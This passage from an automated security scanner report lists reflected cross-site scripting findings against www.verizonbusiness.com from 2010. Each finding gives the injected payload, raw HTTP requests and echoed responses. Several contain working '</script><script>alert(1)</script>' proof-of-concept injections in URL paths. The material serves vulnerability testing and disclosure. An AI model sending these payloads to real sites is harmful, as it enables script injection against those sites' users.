<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/resources15d90';68b20facfe5/1002a2a15-111-Connecting+Business+Information.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.603. http://www.verizonbusiness.com/resources/1002a2a15-111-Connecting+Business+Information.xml [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a2a15-111-Connecting+Business+Information.xml

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e9664'%3b028b97753fe was submitted in the REST URL parameter 2. This input was echoed as e9664';028b97753fe in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/e9664'%3b028b97753fe HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:21:59 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40210
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:21:59 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:21:59 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/resources/e9664';028b97753fe'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.604. http://www.verizonbusiness.com/resources/1002a2a15-111-Connecting+Business+Information.xml [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a2a15-111-Connecting+Business+Information.xml

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 73a0a</script><script>alert(1)</script>15933b63430 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/1002a2a15-111-Connecting+Business+Information.xml73a0a</script><script>alert(1)</script>15933b63430 HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 200 OK
Server: Roxen/4.5.146-release3
ETag: "4fdbb90af8ee43c342b3b09402fa4462"
Last-Modified: Wed, 17 Nov 2010 00:21:58 GMT
Content-Type: text/html; charset=ISO-8859-1
Vary: User-Agent
Date: Wed, 17 Nov 2010 00:21:58 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: BERT=VRID%3d156b62a8-e540-49ec-abde-b14768740bfd|VTID%3ddb8885e4-f1a5-4e8a-a5a5-d66f73ede1ff|SX%3d1289954517|VP%3d1|RMC%3dxg|LP%3den; expires=Tue, 17 Nov 2015 05:25:41 GMT; domain=www.verizonbusiness.com; path=/
Expires: Mon, 16 Nov 2009 18:21:58 GMT
Content-Length: 32800

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css"><link typ
...[SNIP]...
<url>/resources/1002a2a15-111-Connecting+Business+Information.xml73a0a</script><script>alert(1)</script>15933b63430</url>
...[SNIP]...

1.605. http://www.verizonbusiness.com/resources/1002a2a16-111-Controlling+Costs.xml [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a2a16-111-Controlling+Costs.xml

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 80ad5'%3b2116b6d17be was submitted in the REST URL parameter 1. This input was echoed as 80ad5';2116b6d17be in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources80ad5'%3b2116b6d17be/1002a2a16-111-Controlling+Costs.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:19:53 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40670
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:19:53 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:19:53 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/resources80ad5';2116b6d17be/1002a2a16-111-Controlling+Costs.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.606. http://www.verizonbusiness.com/resources/1002a2a16-111-Controlling+Costs.xml [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a2a16-111-Controlling+Costs.xml

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f3537"%3b4fa2b8d26d0 was submitted in the REST URL parameter 1. This input was echoed as f3537";4fa2b8d26d0 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resourcesf3537"%3b4fa2b8d26d0/1002a2a16-111-Controlling+Costs.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:19:39 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40670
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:19:39 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:19:39 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link med
...[SNIP]...


} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/resourcesf3537";4fa2b8d26d0/1002a2a16-111-Controlling+Costs.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIM
...[SNIP]...

1.607. http://www.verizonbusiness.com/resources/1002a2a16-111-Controlling+Costs.xml [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a2a16-111-Controlling+Costs.xml

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload eb68e'%3b99175b8f49f was submitted in the REST URL parameter 2. This input was echoed as eb68e';99175b8f49f in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/eb68e'%3b99175b8f49f HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:21:33 GMT
Content-Type: text/html
Content-Length: 40210
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:21:33 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:21:33 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/resources/eb68e';99175b8f49f'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.608. http://www.verizonbusiness.com/resources/1002a2a16-111-Controlling+Costs.xml [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a2a16-111-Controlling+Costs.xml

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e1ba1</script><script>alert(1)</script>68d431132d7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/1002a2a16-111-Controlling+Costs.xmle1ba1</script><script>alert(1)</script>68d431132d7 HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 200 OK
Server: Roxen/4.5.146-release3
ETag: "8cdaf24f91208cae384d11d4276acce9"
Last-Modified: Wed, 17 Nov 2010 00:21:32 GMT
Content-Type: text/html; charset=ISO-8859-1
Vary: User-Agent
Date: Wed, 17 Nov 2010 00:21:32 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: BERT=VRID%3d0ee01539-26be-4114-ac5c-8d9c02250973|VTID%3d1f91dc4c-f9bf-4ce8-8c39-d86bf644d609|SX%3d1289954492|VP%3d1|RMC%3dxg|LP%3den; expires=Tue, 17 Nov 2015 05:25:16 GMT; domain=www.verizonbusiness.com; path=/
Expires: Mon, 16 Nov 2009 18:21:32 GMT
Content-Length: 33092

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...
<url>/resources/1002a2a16-111-Controlling+Costs.xmle1ba1</script><script>alert(1)</script>68d431132d7</url>
...[SNIP]...

1.609. http://www.verizonbusiness.com/resources/1002a2a17-111-Expanding+Into+New+Markets.xml [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a2a17-111-Expanding+Into+New+Markets.xml

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3c8f6"%3b53d1640dba6 was submitted in the REST URL parameter 1. This input was echoed as 3c8f6";53d1640dba6 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources3c8f6"%3b53d1640dba6/1002a2a17-111-Expanding+Into+New+Markets.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Last-Modified: Wed, 17 Nov 2010 00:23:04 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 40688
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:23:04 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:23:04 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...


} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/resources3c8f6";53d1640dba6/1002a2a17-111-Expanding+Into+New+Markets.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDAT
...[SNIP]...

1.610. http://www.verizonbusiness.com/resources/1002a2a17-111-Expanding+Into+New+Markets.xml [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a2a17-111-Expanding+Into+New+Markets.xml

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fb52e'%3bf0bebafbc0e was submitted in the REST URL parameter 1. This input was echoed as fb52e';f0bebafbc0e in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resourcesfb52e'%3bf0bebafbc0e/1002a2a17-111-Expanding+Into+New+Markets.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:23:17 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40690
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:23:17 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:23:17 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css"><link typ
...[SNIP]...
<script type="text/javascript">
var request='/resourcesfb52e';f0bebafbc0e/1002a2a17-111-Expanding+Into+New+Markets.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.611. http://www.verizonbusiness.com/resources/1002a2a17-111-Expanding+Into+New+Markets.xml [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a2a17-111-Expanding+Into+New+Markets.xml

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c7f3a'%3b5b361af62df was submitted in the REST URL parameter 2. This input was echoed as c7f3a';5b361af62df in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/c7f3a'%3b5b361af62df HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:24:06 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40210
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:24:06 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:24:06 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/resources/c7f3a';5b361af62df'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.612. http://www.verizonbusiness.com/resources/1002a2a17-111-Expanding+Into+New+Markets.xml [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a2a17-111-Expanding+Into+New+Markets.xml

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9dbf0</script><script>alert(1)</script>b9e986f25bc was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/1002a2a17-111-Expanding+Into+New+Markets.xml9dbf0</script><script>alert(1)</script>b9e986f25bc HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 200 OK
Server: Roxen/4.5.146-release3
ETag: "d8cc846bbcaaafee52d304b94de691dd"
Last-Modified: Wed, 17 Nov 2010 00:23:55 GMT
Content-Type: text/html; charset=ISO-8859-1
Vary: User-Agent
Date: Wed, 17 Nov 2010 00:23:55 GMT
Content-Length: 31145
Connection: close
Set-Cookie: BERT=VRID%3dede64427-1ae3-4cae-9b0a-debe77064f73|VTID%3dc06b9998-8254-484e-87b9-411042174e65|SX%3d1289954635|VP%3d1|RMC%3dxg|LP%3den; expires=Tue, 17 Nov 2015 05:27:39 GMT; domain=www.verizonbusiness.com; path=/
Expires: Mon, 16 Nov 2009 18:23:55 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet"><link med
...[SNIP]...
<url>/resources/1002a2a17-111-Expanding+Into+New+Markets.xml9dbf0</script><script>alert(1)</script>b9e986f25bc</url>
...[SNIP]...

1.613. http://www.verizonbusiness.com/resources/1002a2a18-111-Going+Green.xml [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a2a18-111-Going+Green.xml

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5dde2"%3bb708390f7e2 was submitted in the REST URL parameter 1. This input was echoed as 5dde2";b708390f7e2 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources5dde2"%3bb708390f7e2/1002a2a18-111-Going+Green.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:23:19 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40658
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:23:19 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:23:19 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...


} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/resources5dde2";b708390f7e2/1002a2a18-111-Going+Green.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELE
...[SNIP]...

1.614. http://www.verizonbusiness.com/resources/1002a2a18-111-Going+Green.xml [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a2a18-111-Going+Green.xml

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 72221'%3beeda792b864 was submitted in the REST URL parameter 1. This input was echoed as 72221';eeda792b864 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources72221'%3beeda792b864/1002a2a18-111-Going+Green.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:23:27 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40660
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:23:27 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:23:27 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css"><link typ
...[SNIP]...
<script type="text/javascript">
var request='/resources72221';eeda792b864/1002a2a18-111-Going+Green.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.615. http://www.verizonbusiness.com/resources/1002a2a18-111-Going+Green.xml [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a2a18-111-Going+Green.xml

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b3c86'%3b8de0ea00750 was submitted in the REST URL parameter 2. This input was echoed as b3c86';8de0ea00750 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/b3c86'%3b8de0ea00750 HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:26:24 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40210
Vary: Accept-Encoding
